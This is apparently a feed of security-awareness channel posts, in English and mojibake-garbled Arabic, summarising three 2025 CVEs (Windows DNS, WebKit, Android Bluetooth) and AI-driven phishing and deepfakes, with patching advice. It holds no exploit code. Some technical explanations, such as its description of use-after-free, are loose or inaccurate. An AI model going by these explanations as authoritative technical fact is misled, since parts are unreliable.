Letโs talk about something dangerous โ ๏ธ
โ Content warning: This content is copyrighted. โญ
---
Today, weโll discuss a CVE that was recently registered on March 11, 2025, titled:
CVE-2025-24064
Whoa! What does this do, Spider?
Iโll tell you, my friend! This CVE or security vulnerability exploits a Use-After-Free (UAF) bug.
๐ค What is Use-After-Free?
Itโs a vulnerability that occurs in data handling within a network, device, or programming language, depending on how it is used. It is triggered through a payload using free(), leading to unexpected behavior.
---
๐ Back to our topic!
This CVE affects Windows DNS Server over a network.
It allows an attacker to execute UAF-based code, potentially disrupting DNS services for Windows users.
It has a severity score of 8.1, meaning it's highly dangerous.
A successful attacker could execute a reverse shell, gaining access to the vulnerable system.
๐ ๏ธ Affected systems:
Windows Server 2022
Windows Server 2019
Windows Server 2016
Windows Server 2012
---
๐ How to protect yourself?
โ Update your system regularly to patch vulnerabilities.
โ Monitor DNS traffic using IDS (Intrusion Detection System) or IPS (Intrusion Prevention System) to detect and prevent exploit attempts.
โ Content warning: This content is copyrighted. โญ
---
Today, weโll discuss a CVE that was recently registered on March 11, 2025, titled:
CVE-2025-24064
Whoa! What does this do, Spider?
Iโll tell you, my friend! This CVE or security vulnerability exploits a Use-After-Free (UAF) bug.
๐ค What is Use-After-Free?
Itโs a vulnerability that occurs in data handling within a network, device, or programming language, depending on how it is used. It is triggered through a payload using free(), leading to unexpected behavior.
---
๐ Back to our topic!
This CVE affects Windows DNS Server over a network.
It allows an attacker to execute UAF-based code, potentially disrupting DNS services for Windows users.
It has a severity score of 8.1, meaning it's highly dangerous.
A successful attacker could execute a reverse shell, gaining access to the vulnerable system.
๐ ๏ธ Affected systems:
Windows Server 2022
Windows Server 2019
Windows Server 2016
Windows Server 2012
---
๐ How to protect yourself?
โ Update your system regularly to patch vulnerabilities.
โ Monitor DNS traffic using IDS (Intrusion Detection System) or IPS (Intrusion Prevention System) to detect and prevent exploit attempts.
โค1
๏ดฟ ูู ุฃุฐููุฑู ุฑูุจููู ุฅูุฐุง ููุณูุชู ๏ดพ
ยท ุณูุจุญุงู ุงููู
ยท ุงูุญู ุฏ ููู
ยท ุงููู ุฃูุจุฑ
ยท ุฃุณุชุบูุฑ ุงููู
ยท ูุง ุฅูู ุฅูุง ุงููู
ยท ูุง ุญูู ููุง ููุฉ ุฅูุง ุจุงููู
ยท ุงููููู ุตููู ูุณููู ุนูู ูุจููุง ู ุญู ุฏ
ยท ุณูุจุญุงู ุงููู ูุจุญู ุฏู ุณูุจุญุงู ุงููู ุงูุนุธูู
ยท ุณูุจุญุงู ุงููู
ยท ุงูุญู ุฏ ููู
ยท ุงููู ุฃูุจุฑ
ยท ุฃุณุชุบูุฑ ุงููู
ยท ูุง ุฅูู ุฅูุง ุงููู
ยท ูุง ุญูู ููุง ููุฉ ุฅูุง ุจุงููู
ยท ุงููููู ุตููู ูุณููู ุนูู ูุจููุง ู ุญู ุฏ
ยท ุณูุจุญุงู ุงููู ูุจุญู ุฏู ุณูุจุญุงู ุงููู ุงูุนุธูู
โค1๐1
ู
ุชูุฌู ูุชููู
ุนู zero day ูู ุงูููู ๐
ุงู ูุนู ุณุจุงูุฏุฑ ุงูุช ุจุชููู ุงู ๐
ุทุจ ุงุดุชุฑู ู ูู ูุงุฎุฑ ๐
*ุชุญุฐูุฑ ู ุญุชูู ููุงู ูู ุญููู ุทุจุน ู ูุดุฑ โญ
ู ูุถูุนูุง ุงูููุงุฑุฏู ุนู
CVE-2025-24201
ุงูุซุบุฑู ุฏู ุชุนุชุจุฑ ุฒูุฑู ุฏุงู ูููุง ููู 14 ู ุงุฑุณ ๐
ุงูู ูู ุงูุซุบุฑู ุฏู ุงูุชุดูููุง ูู ู ุชุตูุญ WebKit
ุงุณุชูุงุงุงุง ู ุด WebKit ุฏุง ุงูู ู ุณูุงุฑู ( Safari )
ุงูู ูุนุฒูุฒู ููู ู ุตุญ ุงูุช ู ุนู ุงูููู ููุง ุงู ุ
ุงูู ูู ููุน ุงูุซุบุฑู ( Out-of-Bounds Write )
ุงู ุงูุซุบุฑู ุฏู ุ
ุงูุง ููููู ุงูุซุบุฑู ุฏู ุจุชุญุตู ูู ุง ูุชุงุจู ุงูุจูุงูุงุช ูู ุงูุฐุงูุฑู ุงูู ูุฑูุถ ุจูููู ูู ุญุฏูุฏ ุงู ููู ุชู ูุน ุงูุชุนุฏูู ุนูู ู ููุน ุบูุฑ ู ุฎุตุตู ูููุง ุงูุญูููุฉ ู ุด ู ูุฌูุฏู ู ุงูุซุบุฑู ุฏู ุจุชูุญ ุงู ูุญุตู rce ุนูู ุงูุชูููู
ุงูุญู ุฏุงููู ุงูู ู ูุฒู ุชุญุฏูุซ ios 18
ู ุด ุนุงูุฒ ุงุตุฏู ู ูุนุฒูุฑู ุจุณ ููุง ุจุชุดุชุบู ุนูู
iOS 18.3.2 ูู ุง ูุจูู
iPadOS 18.3.2 ูู ุง ูุจูู
macOS Sequoia 15.3.2 ูู ุง ูุจูู
Safari 18.3.1 ูู ุง ูุจูู
visionOS 2.3.2 ูู ุง ูุจูู
ุทูุจ ุงูุญู ุงู ุ
ูุฒู ุชุญุฏูุซ ios ุฌุฏูุฏ โ
ูุฒู ุจุฑุงู ุฌ ุญู ุงูู antivirus โ
ุฎูู ุจุงูู ู ู ู ุญุชูู ุงูู ุดุจูู โ
ู ุตุฏุฑ ุงูุซุบุฑู :
https://nvd.nist.gov/vuln/detail/CVE-2025-24201
ุงู ูุนู ุณุจุงูุฏุฑ ุงูุช ุจุชููู ุงู ๐
ุทุจ ุงุดุชุฑู ู ูู ูุงุฎุฑ ๐
*ุชุญุฐูุฑ ู ุญุชูู ููุงู ูู ุญููู ุทุจุน ู ูุดุฑ โญ
ู ูุถูุนูุง ุงูููุงุฑุฏู ุนู
CVE-2025-24201
ุงูุซุบุฑู ุฏู ุชุนุชุจุฑ ุฒูุฑู ุฏุงู ูููุง ููู 14 ู ุงุฑุณ ๐
ุงูู ูู ุงูุซุบุฑู ุฏู ุงูุชุดูููุง ูู ู ุชุตูุญ WebKit
ุงุณุชูุงุงุงุง ู ุด WebKit ุฏุง ุงูู ู ุณูุงุฑู ( Safari )
ุงูู ูุนุฒูุฒู ููู ู ุตุญ ุงูุช ู ุนู ุงูููู ููุง ุงู ุ
ุงูู ูู ููุน ุงูุซุบุฑู ( Out-of-Bounds Write )
ุงู ุงูุซุบุฑู ุฏู ุ
ุงูุง ููููู ุงูุซุบุฑู ุฏู ุจุชุญุตู ูู ุง ูุชุงุจู ุงูุจูุงูุงุช ูู ุงูุฐุงูุฑู ุงูู ูุฑูุถ ุจูููู ูู ุญุฏูุฏ ุงู ููู ุชู ูุน ุงูุชุนุฏูู ุนูู ู ููุน ุบูุฑ ู ุฎุตุตู ูููุง ุงูุญูููุฉ ู ุด ู ูุฌูุฏู ู ุงูุซุบุฑู ุฏู ุจุชูุญ ุงู ูุญุตู rce ุนูู ุงูุชูููู
ุงูุญู ุฏุงููู ุงูู ู ูุฒู ุชุญุฏูุซ ios 18
ู ุด ุนุงูุฒ ุงุตุฏู ู ูุนุฒูุฑู ุจุณ ููุง ุจุชุดุชุบู ุนูู
iOS 18.3.2 ูู ุง ูุจูู
iPadOS 18.3.2 ูู ุง ูุจูู
macOS Sequoia 15.3.2 ูู ุง ูุจูู
Safari 18.3.1 ูู ุง ูุจูู
visionOS 2.3.2 ูู ุง ูุจูู
ุทูุจ ุงูุญู ุงู ุ
ูุฒู ุชุญุฏูุซ ios ุฌุฏูุฏ โ
ูุฒู ุจุฑุงู ุฌ ุญู ุงูู antivirus โ
ุฎูู ุจุงูู ู ู ู ุญุชูู ุงูู ุดุจูู โ
ู ุตุฏุฑ ุงูุซุบุฑู :
https://nvd.nist.gov/vuln/detail/CVE-2025-24201
โค1๐1
Letโs Talk About a Zero-Day in iPhone ๐
Whatโs up, Spider? What are you talking about? ๐
Alright, let me break it down for you. ๐
๐จ Content Warning: This channel holds copyright rights. โญ
---
Today's Topic: CVE-2025-24201
This vulnerability is classified as a zero-day because it was discovered on March 14 ๐.
The flaw was found in the WebKit browser engine.
Wait a minute... isnโt WebKit the engine used in Safari?
Yes, my friend, you got that right! Do you own an iPhone or what?
---
Whatโs the Type of This Vulnerability?
๐ Out-of-Bounds Write
What does that mean? ๐ค
Well, normally, when writing data to memory, there should be security boundaries that prevent modification of unauthorized memory locations. However, this vulnerability bypasses those boundaries, allowing an attacker to execute Remote Code Execution (RCE) on the target device.
---
Which Devices Are Affected?
The vulnerability affects the following systems:
iOS 18.3.2 and earlier
iPadOS 18.3.2 and earlier
macOS Sequoia 15.3.2 and earlier
Safari 18.3.1 and earlier
visionOS 2.3.2 and earlier
---
How to Protect Yourself?
โ Update to the latest iOS version.
โ Install antivirus and security software.
โ Be cautious of suspicious content and links.
---
Source of the CVE:
https://nvd.nist.gov/vuln/detail/CVE-2025-24201
Whatโs up, Spider? What are you talking about? ๐
Alright, let me break it down for you. ๐
๐จ Content Warning: This channel holds copyright rights. โญ
---
Today's Topic: CVE-2025-24201
This vulnerability is classified as a zero-day because it was discovered on March 14 ๐.
The flaw was found in the WebKit browser engine.
Wait a minute... isnโt WebKit the engine used in Safari?
Yes, my friend, you got that right! Do you own an iPhone or what?
---
Whatโs the Type of This Vulnerability?
๐ Out-of-Bounds Write
What does that mean? ๐ค
Well, normally, when writing data to memory, there should be security boundaries that prevent modification of unauthorized memory locations. However, this vulnerability bypasses those boundaries, allowing an attacker to execute Remote Code Execution (RCE) on the target device.
---
Which Devices Are Affected?
The vulnerability affects the following systems:
iOS 18.3.2 and earlier
iPadOS 18.3.2 and earlier
macOS Sequoia 15.3.2 and earlier
Safari 18.3.1 and earlier
visionOS 2.3.2 and earlier
---
How to Protect Yourself?
โ Update to the latest iOS version.
โ Install antivirus and security software.
โ Be cautious of suspicious content and links.
---
Source of the CVE:
https://nvd.nist.gov/vuln/detail/CVE-2025-24201
โค3
Forwarded from SPIDER SECURITY
ู
ุญุชูู ุจูุฑู ูููู ุงู โจ
Anonymous Poll
74%
ูุฑูู ูุงุญู
ุฑ : red team
5%
ูุฑูู ูุงุฒุฑู : blue team
21%
ุฐูุงุก ุงุตุทูุงุนู : ai
๐2
ูุงู ุฑุณูู ุงููู ุนููู ุงูุตูุงุฉ ูุงูุณูุงู
(ุงุฐุง ู
ุงุช ุงุจู ุงุฏู
ุงููุทุน ุนู
ูู ุงูุง ู
ู ุซูุงุซ ุตุฏูุฉ ุฌุงุฑูุฉ ุงู ุนูู
ููุชูุน ุจู ุงู ููุฏ ุตุงูุญ ูุฏุนู ูู)
โค2
ุจูุณุช ุงูููุงุฑุฏู ู
ููุณ ุจูู ุงูุฐูุงุก ุงูุงุตุทูุงุนู ู ุงูุณุงูุจุฑ ุณูููุฑุชู ๐
ุชุญุฐูุฑูู
ูุงูู : ุงูููุงู ุบูุฑ ู ุณุคููู ุนู ุงูุฐู ุณูู ูุชู ู ุง ูุชู ูุนููุง ู ู ุงูุดุฎุต ุฏุง ู ูุงู ุนูู ู ู ู ููุฏ
ุงูุชุงูู : ุงูููุงู ูููุง ุญููู ุทุจุน ู ูุดุฑ ุนุงูุฒูุง ุชุฏุฎู ุชููู ูู ุฎุงุต
ูุฑุฌุน ู ู ูุถูุนูุง ๐
ุงูููุชู ุจูู ุจูุญุตู ุงุนู ุงู ุจูู ุงูุฐูุงุก ุงูุงุตุทูุงุนู ู ุงูุณุงูุจุฑ ุณูููุฑุชู ู ู ููู ุงุนู ุงู ููุดููุฌ
ูู ููุดููุฌ ูุณุจุงูุฏุฑ ๐ฑ
ุจุต ูุนุฒูุฒู ุนุดุงู ุนุงุฑู ุงูุช ุฏูููุชู ุจุชููู ุงู ุงูููุดููุฌ ุฏุง ุงุฎุชุตุงุฑ ุงู ุงูููุดููุฌ ุฏุง ุจูููู ุตูุญู ู ุฒูุฑู ุจุชูุชุจ ุจููุง ุจูุงูุงุชู ู ุจุชุฑูุญ ู ุตุงุญุจ ุงูุตูุญู ู ุจุชููู ุดุจู ุงูู ููุน ุงูุญูููู ุจุธุจุท
ุงูู ูู ุงูููุชู ุจูู ูู ูุงุณ ูู ุงูุฑูุจุง ุชุญุฏูุฏุง ุจูุณุชุฎุฏู ู ai ( ู ุด ู ุชุนูู ูู ุจุฑู ุฌู ) ุนุดุงู ููุชุจ ููุฏ ุตูุญู ู ุฒูุฑู ุดุจู Facebook ู ุงูุช ุชุฏุฎู ุนูููุง ู ูุฌุงู ุชููู ุญุณุงุจู ุฑุงุญ ุฏุง ุบูุฑ ุงูู ุจูููู ุนูุฏู ุนููุงูู ( ip ) ู ุนู ุทุฑูู ip ููุฏุฑ ูุฌูุจู ู ุจุนุฏูุง ุทูุฑู ุงูู ูุถูุน ุจูู ุจูุณุชุฎุฏู ู ุงูุฐูุงุก ุงูุงุตุทูุงุนู ุนูู ุงุณุงุณ ุงููู ุญุฏ ู ู ุจูู ุงู ูุฌู ู ุดููุฑ ู ูููู ูู ู ู ููู ุงูููุช ุงู ููู ูู ุจุฑ ููู ููู ู ู ู ููู ุงูููุช ูุนู ู ููุฏูู ุนูู ุงุณุงุณ ุงูู ูุฌู ุฏุง ุงู ุงูุดุฎุต ุฏุง ู ููู ูู ุจุฑ ุจูุบูุฑ ุงูุตูุช ุงูู ูุถูุน ุฏุง ูุงูุจ ุฃูุฑูุจุง ูููุง ู ุฎูู ุจุงููู โค๏ธ
ุงูุญู ุงู ุทูุจ ูุง ุณุจุงูุฏุฑ ๐
ุจุต ุงูู ุญุงุฌู
ู ุด ุชุฑุฏ ุนูู ุฑูู ุบุฑูุจ ูุนูู ูู ูููุช ุฑูู ู ุจููููู ุงูุง ู ุญู ุฏ ุฑู ุถุงู ู ุจููููู ุนููุงูู ู ุฑูู ุงูููุฒู ูููู ุงูุช ุญู ุถุงู
ู ุด ุชูุจู ุงู ุงูููุช ููู ุบูุฑ ูู ุง ุชุชุงูุฏ ุงูู ุดุฎุต ุญูููู
ู ุด ุชุฑุฏ ุนูู ุงู ุฑุณุงูู ู ุฌูููู ูู sms ุงู ุงููุงุชุณ ุงู ุงู
ู ุด ุชุฏุฎู ุนูู ููููุงุช ู ุดุจููุฉ ูุนูู ู ุซูุง
www.fecebook.com
ุงูุตุญู ุชุดูุฑ ุงูุจูุณุช ูู ุฎูุฑ ู ุด ุดุฑุท ูุชุงุจู ู ุญุชูู ููุณู ู ุฌุงูู ูููู ูุชุงุจู ูููุง ุงูุญููู ุทุจุน ู ุงููุดุฑ ุงุชู ูู ุชุฎูู ุจุงููู โค๏ธ
ุชุญุฐูุฑูู
ูุงูู : ุงูููุงู ุบูุฑ ู ุณุคููู ุนู ุงูุฐู ุณูู ูุชู ู ุง ูุชู ูุนููุง ู ู ุงูุดุฎุต ุฏุง ู ูุงู ุนูู ู ู ู ููุฏ
ุงูุชุงูู : ุงูููุงู ูููุง ุญููู ุทุจุน ู ูุดุฑ ุนุงูุฒูุง ุชุฏุฎู ุชููู ูู ุฎุงุต
ูุฑุฌุน ู ู ูุถูุนูุง ๐
ุงูููุชู ุจูู ุจูุญุตู ุงุนู ุงู ุจูู ุงูุฐูุงุก ุงูุงุตุทูุงุนู ู ุงูุณุงูุจุฑ ุณูููุฑุชู ู ู ููู ุงุนู ุงู ููุดููุฌ
ูู ููุดููุฌ ูุณุจุงูุฏุฑ ๐ฑ
ุจุต ูุนุฒูุฒู ุนุดุงู ุนุงุฑู ุงูุช ุฏูููุชู ุจุชููู ุงู ุงูููุดููุฌ ุฏุง ุงุฎุชุตุงุฑ ุงู ุงูููุดููุฌ ุฏุง ุจูููู ุตูุญู ู ุฒูุฑู ุจุชูุชุจ ุจููุง ุจูุงูุงุชู ู ุจุชุฑูุญ ู ุตุงุญุจ ุงูุตูุญู ู ุจุชููู ุดุจู ุงูู ููุน ุงูุญูููู ุจุธุจุท
ุงูู ูู ุงูููุชู ุจูู ูู ูุงุณ ูู ุงูุฑูุจุง ุชุญุฏูุฏุง ุจูุณุชุฎุฏู ู ai ( ู ุด ู ุชุนูู ูู ุจุฑู ุฌู ) ุนุดุงู ููุชุจ ููุฏ ุตูุญู ู ุฒูุฑู ุดุจู Facebook ู ุงูุช ุชุฏุฎู ุนูููุง ู ูุฌุงู ุชููู ุญุณุงุจู ุฑุงุญ ุฏุง ุบูุฑ ุงูู ุจูููู ุนูุฏู ุนููุงูู ( ip ) ู ุนู ุทุฑูู ip ููุฏุฑ ูุฌูุจู ู ุจุนุฏูุง ุทูุฑู ุงูู ูุถูุน ุจูู ุจูุณุชุฎุฏู ู ุงูุฐูุงุก ุงูุงุตุทูุงุนู ุนูู ุงุณุงุณ ุงููู ุญุฏ ู ู ุจูู ุงู ูุฌู ู ุดููุฑ ู ูููู ูู ู ู ููู ุงูููุช ุงู ููู ูู ุจุฑ ููู ููู ู ู ู ููู ุงูููุช ูุนู ู ููุฏูู ุนูู ุงุณุงุณ ุงูู ูุฌู ุฏุง ุงู ุงูุดุฎุต ุฏุง ู ููู ูู ุจุฑ ุจูุบูุฑ ุงูุตูุช ุงูู ูุถูุน ุฏุง ูุงูุจ ุฃูุฑูุจุง ูููุง ู ุฎูู ุจุงููู โค๏ธ
ุงูุญู ุงู ุทูุจ ูุง ุณุจุงูุฏุฑ ๐
ุจุต ุงูู ุญุงุฌู
ู ุด ุชุฑุฏ ุนูู ุฑูู ุบุฑูุจ ูุนูู ูู ูููุช ุฑูู ู ุจููููู ุงูุง ู ุญู ุฏ ุฑู ุถุงู ู ุจููููู ุนููุงูู ู ุฑูู ุงูููุฒู ูููู ุงูุช ุญู ุถุงู
ู ุด ุชูุจู ุงู ุงูููุช ููู ุบูุฑ ูู ุง ุชุชุงูุฏ ุงูู ุดุฎุต ุญูููู
ู ุด ุชุฑุฏ ุนูู ุงู ุฑุณุงูู ู ุฌูููู ูู sms ุงู ุงููุงุชุณ ุงู ุงู
ู ุด ุชุฏุฎู ุนูู ููููุงุช ู ุดุจููุฉ ูุนูู ู ุซูุง
www.fecebook.com
ุงูุตุญู ุชุดูุฑ ุงูุจูุณุช ูู ุฎูุฑ ู ุด ุดุฑุท ูุชุงุจู ู ุญุชูู ููุณู ู ุฌุงูู ูููู ูุชุงุจู ูููุง ุงูุญููู ุทุจุน ู ุงููุดุฑ ุงุชู ูู ุชุฎูู ุจุงููู โค๏ธ
โค2
Forwarded from SPIDER SECURITY
โ ๏ธ Two Warnings Before We Start:
1๏ธโฃ This channel is not responsible for any misuse of the information provided. This is purely for educational purposes.
2๏ธโฃ All rights reserved. If you want to share the content, contact me first.
๐ค AI & Cybersecurity - Phishing Spider ๐ท๏ธ
Artificial intelligence is now being used in cybercrime, and one of the biggest threats is phishing attacks.
What is phishing?
Phishing is when hackers create fake websites that look exactly like real ones (e.g., Facebook) to steal your login credentials.
Whatโs new?
In Europe, even people with no coding skills are now using AI to generate phishing pages that are almost indistinguishable from the original. If you enter your credentials, your account is gone instantly!
Even worse, scammers now use AI-powered tactics to impersonate banks or celebrities:
Deepfake videos to mimic famous people.
Voice cloning to sound like someone you trust.
Fake numbers to contact victims and gain their trust.
This technique is spreading rapidly in Europe, so be careful!
๐ก๏ธ How to Protect Yourself?
โ Do not answer calls from unknown numbers, even if they claim to be a celebrity or a bank official.
โ Do not accept friend requests from suspicious accounts without verifying their identity.
โ Do not reply to unknown messages via SMS, WhatsApp, or other platforms.
โ Do not click on suspicious links, for example:
โ www.fecebook.com instead of www.facebook.com
Share this post to raise awareness! Cybersecurity starts with knowledge. โค๏ธ
1๏ธโฃ This channel is not responsible for any misuse of the information provided. This is purely for educational purposes.
2๏ธโฃ All rights reserved. If you want to share the content, contact me first.
๐ค AI & Cybersecurity - Phishing Spider ๐ท๏ธ
Artificial intelligence is now being used in cybercrime, and one of the biggest threats is phishing attacks.
What is phishing?
Phishing is when hackers create fake websites that look exactly like real ones (e.g., Facebook) to steal your login credentials.
Whatโs new?
In Europe, even people with no coding skills are now using AI to generate phishing pages that are almost indistinguishable from the original. If you enter your credentials, your account is gone instantly!
Even worse, scammers now use AI-powered tactics to impersonate banks or celebrities:
Deepfake videos to mimic famous people.
Voice cloning to sound like someone you trust.
Fake numbers to contact victims and gain their trust.
This technique is spreading rapidly in Europe, so be careful!
๐ก๏ธ How to Protect Yourself?
โ Do not answer calls from unknown numbers, even if they claim to be a celebrity or a bank official.
โ Do not accept friend requests from suspicious accounts without verifying their identity.
โ Do not reply to unknown messages via SMS, WhatsApp, or other platforms.
โ Do not click on suspicious links, for example:
โ www.fecebook.com instead of www.facebook.com
Share this post to raise awareness! Cybersecurity starts with knowledge. โค๏ธ
โค2
ุฒู ู
ุดุฑุญูุง ios ุฌู ุฏูุฑ ูุงูุฏุฑููุฏ
*ุชุญุฐูุฑูู*
ุงูุงูู : ุงูููุงู ุบูุฑ ู ุณุคููู ุนู ูุนู ู ุณุชุฎุฏู
ุงูุชุงูู : ุงูููุงู ูููุง ุญููู ุทุจุน ู ูุดุฑ
ูุฑุฌุน ู ู ูุถูุนูุง ๐
ุงูููุงุฑุฏู ููุชููู ุนู cve ูุฑูุฏ ู ู ููุนู
ูุณู ูุงุฒู ู ู ูุฑูุจ ูุนุชุจุฑ ู ุฑูุฒ ูุนุชุจุฑ
ุฒูุฑู ุฏุงู cve ุงูููุงุฑุฏู ุงุณู ู
CVE-2025-0074
ุงูุชุงุฑูุฎ : 2024 ุฏูุณู ุจุฑ ููู 13 ู 2025 ู ุงุฑุณ ููู 3 ๐
ุจูุนู ู ุงู ุงูcve ุฏุง ูุง ุณุจุงูุฏุฑ ๐
ุจุต ูุนุฒูุฒู ุงูcve ุจูุดุชุบู ุนู ุทุฑูู
ุจููุชูุซ ุจุฏูู ุฑูุฒ ู ุนุงูุง ู ุฏู ูุง ุงุฐู ู ู
ู ุณุชุฎุฏู ููุง ุงุถุงูุงุช ููุง ุงู ุชูุงุฒุช
ูููุงุฑ ุงุจูุถ ูุง ุณุจุงูุฏุฑ ูุนูู ุงูุง ู ู ูู
ุงุดูู ุญุฏ ุนู ู cve ุฏุง ุนูู ุฌูุงุฒู ู ุงูุง ู ุด ุนุงุฑู ๐ฑ
ููููู ุงูู ู ูู ุงู ููุนู ู rce ๐
ุงููู ูุทู ูู ุทู ูุชูู ๐
ูุฑุฌุน ูู ูุถูุนูุง ุงู cve ุจูุดุชุบู ุนู
ุทุฑูู ูุฌู ู UAF ( Use-After-Free )
ู ุงูู ุฑู ุฏู ุจุชูุญ ุงู ุงูุดุฎุต ููุชุจ ููุฏ
ุจุฑู ุฌูุงุช ุฎุจูุซู ( malware ) ุนูู ุฌูุงุฒ
ุงูุถุญูู ุจุฏูู ุนูู ู ูู ู ุงูุซุบุฑู ุชู
ุชูุตูููุง ุงูู ุญุฑุฌู ( Critical )
ุทุจ ุงูุญู ุฏุงููู ุงูุง ุฌูุงุฒู ุงูุฏุฑููุฏ 14
ูุงุงุงุง ูุนุฒูุฒู ููุณููู ุงูููู ุงูู ุจูุจุฏุงุก ู ู ุงูู
ุงูุฏูุฑูุฏ 14 ู ุงูุฏุฑููุฏ 13 ู ุงูุฏุฑููุฏ 12
ู ุงูุฏูุฑูุฏ 11 ุจุณ ุงูุฎุจุฑ ุงูุญูู ู ุด
ุจุชุดุชุบู ุนูู ุงูุฏูุฑูุฏ ูุจู 11 ูุนูู
ุงูุฏุฑููุฏ 9 ุนุงุฏู ู ุงูู ู ูู
ุทูุจ ุงูุญู ุงู ุ
ุงูุญู :
ุชุญุฏุซ ุงุฎุฑ ุงุตุฏุงุฑ ุนูุฏู โ
ุชูุฒู antivirus โ
ู ุด ุชุจูู ูุงุชุญ ุจููุชูุซ ูุชูุฑ โ
ุดูุฑุง ุนูู ุฏุนู ูู ูููุง ุฏุนู ูู ููุง ู ุด
ุทูุฑุช ุงูู ุญุชูู ู ุฏุงูู ุง ุจุญุงูู ุงุทูุฑู
ุจุณุจุจ ุฏุนู ูู ู ุดูุฑุง ๐ค
ู ุตุฏุฑ :
https://www.cve.org/CVERecord?id=CVE-2025-0074
https://vulert.com/vuln-db/CVE-2025-0074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0074
https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250304
*ุชุญุฐูุฑูู*
ุงูุงูู : ุงูููุงู ุบูุฑ ู ุณุคููู ุนู ูุนู ู ุณุชุฎุฏู
ุงูุชุงูู : ุงูููุงู ูููุง ุญููู ุทุจุน ู ูุดุฑ
ูุฑุฌุน ู ู ูุถูุนูุง ๐
ุงูููุงุฑุฏู ููุชููู ุนู cve ูุฑูุฏ ู ู ููุนู
ูุณู ูุงุฒู ู ู ูุฑูุจ ูุนุชุจุฑ ู ุฑูุฒ ูุนุชุจุฑ
ุฒูุฑู ุฏุงู cve ุงูููุงุฑุฏู ุงุณู ู
CVE-2025-0074
ุงูุชุงุฑูุฎ : 2024 ุฏูุณู ุจุฑ ููู 13 ู 2025 ู ุงุฑุณ ููู 3 ๐
ุจูุนู ู ุงู ุงูcve ุฏุง ูุง ุณุจุงูุฏุฑ ๐
ุจุต ูุนุฒูุฒู ุงูcve ุจูุดุชุบู ุนู ุทุฑูู
ุจููุชูุซ ุจุฏูู ุฑูุฒ ู ุนุงูุง ู ุฏู ูุง ุงุฐู ู ู
ู ุณุชุฎุฏู ููุง ุงุถุงูุงุช ููุง ุงู ุชูุงุฒุช
ูููุงุฑ ุงุจูุถ ูุง ุณุจุงูุฏุฑ ูุนูู ุงูุง ู ู ูู
ุงุดูู ุญุฏ ุนู ู cve ุฏุง ุนูู ุฌูุงุฒู ู ุงูุง ู ุด ุนุงุฑู ๐ฑ
ููููู ุงูู ู ูู ุงู ููุนู ู rce ๐
ุงููู ูุทู ูู ุทู ูุชูู ๐
ูุฑุฌุน ูู ูุถูุนูุง ุงู cve ุจูุดุชุบู ุนู
ุทุฑูู ูุฌู ู UAF ( Use-After-Free )
ู ุงูู ุฑู ุฏู ุจุชูุญ ุงู ุงูุดุฎุต ููุชุจ ููุฏ
ุจุฑู ุฌูุงุช ุฎุจูุซู ( malware ) ุนูู ุฌูุงุฒ
ุงูุถุญูู ุจุฏูู ุนูู ู ูู ู ุงูุซุบุฑู ุชู
ุชูุตูููุง ุงูู ุญุฑุฌู ( Critical )
ุทุจ ุงูุญู ุฏุงููู ุงูุง ุฌูุงุฒู ุงูุฏุฑููุฏ 14
ูุงุงุงุง ูุนุฒูุฒู ููุณููู ุงูููู ุงูู ุจูุจุฏุงุก ู ู ุงูู
ุงูุฏูุฑูุฏ 14 ู ุงูุฏุฑููุฏ 13 ู ุงูุฏุฑููุฏ 12
ู ุงูุฏูุฑูุฏ 11 ุจุณ ุงูุฎุจุฑ ุงูุญูู ู ุด
ุจุชุดุชุบู ุนูู ุงูุฏูุฑูุฏ ูุจู 11 ูุนูู
ุงูุฏุฑููุฏ 9 ุนุงุฏู ู ุงูู ู ูู
ุทูุจ ุงูุญู ุงู ุ
ุงูุญู :
ุชุญุฏุซ ุงุฎุฑ ุงุตุฏุงุฑ ุนูุฏู โ
ุชูุฒู antivirus โ
ู ุด ุชุจูู ูุงุชุญ ุจููุชูุซ ูุชูุฑ โ
ุดูุฑุง ุนูู ุฏุนู ูู ูููุง ุฏุนู ูู ููุง ู ุด
ุทูุฑุช ุงูู ุญุชูู ู ุฏุงูู ุง ุจุญุงูู ุงุทูุฑู
ุจุณุจุจ ุฏุนู ูู ู ุดูุฑุง ๐ค
ู ุตุฏุฑ :
https://www.cve.org/CVERecord?id=CVE-2025-0074
https://vulert.com/vuln-db/CVE-2025-0074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0074
https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250304
โค2
As We Explained iOS, Now It's Android's Turn!
โ ๏ธ Two Warnings:
1. The channel is not responsible for any misuse of this information.
2. All content is copyrighted. Contact us for permissions.
---
๐ Todayโs Topic: A Unique CVE!
A recently discovered zero-day vulnerability:
CVE-2025-0074
๐ Date of Discovery: December 13, 2024
๐ Security Patch Released: March 3, 2025 ๐
---
๐ฅ What Does This CVE Do?
This vulnerability exploits Bluetooth in a completely silent wayโ
๐ซ No user permission required
๐ซ No additional software needed
๐ซ No special privileges required
๐คฏ So, someone can exploit this CVE on my device without me knowing?
โ Yes! And it allows Remote Code Execution (RCE). ๐
---
๐ ๏ธ How It Works
The attack is based on a Use-After-Free (UAF) vulnerability,
which allows an attacker to inject and execute malicious code (malware) on the victimโs device without their knowledge.
๐จ Severity Level: Critical
---
๐ฑ Affected Devices
Bad news: ๐ข
Affects Android 11, 12, 13, and 14.
Good news: ๐
Does NOT affect Android 9 and lower.
---
โ How to Protect Yourself?
1๏ธโฃ Update to the latest security patch โ
2๏ธโฃ Use a trusted antivirus โ
3๏ธโฃ Keep Bluetooth disabled when not in use โ
---
๐ก Thanks for your support! Your engagement helps me improve the content every day. Stay safe! ๐ค
Source :
https://www.cve.org/CVERecord?id=CVE-2025-0074
https://vulert.com/vuln-db/CVE-2025-0074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0074
https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250304
โ ๏ธ Two Warnings:
1. The channel is not responsible for any misuse of this information.
2. All content is copyrighted. Contact us for permissions.
---
๐ Todayโs Topic: A Unique CVE!
A recently discovered zero-day vulnerability:
CVE-2025-0074
๐ Date of Discovery: December 13, 2024
๐ Security Patch Released: March 3, 2025 ๐
---
๐ฅ What Does This CVE Do?
This vulnerability exploits Bluetooth in a completely silent wayโ
๐ซ No user permission required
๐ซ No additional software needed
๐ซ No special privileges required
๐คฏ So, someone can exploit this CVE on my device without me knowing?
โ Yes! And it allows Remote Code Execution (RCE). ๐
---
๐ ๏ธ How It Works
The attack is based on a Use-After-Free (UAF) vulnerability,
